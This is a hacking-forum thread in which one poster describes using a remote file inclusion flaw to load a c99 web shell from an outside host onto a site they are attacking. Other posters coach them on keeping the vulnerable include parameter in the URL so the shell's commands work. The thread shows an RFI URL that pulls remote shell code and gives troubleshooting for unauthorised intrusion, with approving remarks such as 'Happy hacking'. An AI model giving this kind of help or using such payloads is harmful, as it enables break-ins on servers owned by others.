c99 hack/problem

ok I have found a RFI exploit on this site and whatever. I have the shell coming up because this worked: http://www.site.com/index.php?http://www.jhn.com/c99.txt So the shell comes up and lists all the files and directories. All so good so far until i try to click on a file/folder or run a command and this comes up:

Warning: include() [function.include]: Failed opening '(what ever i'm accessing)' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/ on line 207 ``` or something like that

I tried to upload the shell in the htdocs dir but it always says "file cannot be uploaded from * to /var/www/htdocs

Any insight in what is going on?

Hehe I remember doing the same mistake back on my 1st attempt to RFI :)

U c what u did is exploit a get variable right? U used that variable to INCLUDE ur code to the victim's server.

However, when u click on a folder there are also many get variables from ur shell which indicate the file, command or blah blah u wish to execute etc…

Notice however, that smth is missing, :D U gotta find it now hehe :)

PS: Happy hacking ^^

OoO ok i sorta get what you are saying so i have to sorta customize the shell for that site I'll try that later on

No u don't have to customize anything :P Just don't forget the variable u used to include the shell else when trying to execute any commands, ur shell will not be included at all (da error) :)

If u still don't get it I'll reply with full explanation later. For now i gtg :(

ok i understand about 80%…i'll give it a try in about 2 hours or so…but thanx

well i know what is wrong but i don't know how to make i work still:angry:

Well, I'm not the kind of person who answers questions with riddles so I'm going to break it down to you:

Here is an example of a URL vulnerable to RFI:

markuphttp://www.website.com/index.php?page=about.htm

In this example "page" is being Included. Also you see "page" equals "about.htm" (so about.htm is included) If the code doesn't limit the things that can be filled in behind ?page= you can include any file you want. This is where your shell comes in ;)

Now if you look at the example URL and you understand what's happening you will notice that you forgot one crucial thing… The ?page= part !

This should help you fulfill you noble mission :) Good luck!

S-H

i get that part but the and stuff because i got the shell to show all the files and folders….it's just everytime i try to run a cmd or go to a file/folder the error comes up…. plus the site i'm hacking is http://www.site.com/index.php?http://shell

it does not have nothing like the page= stuff it is just index.php?RFI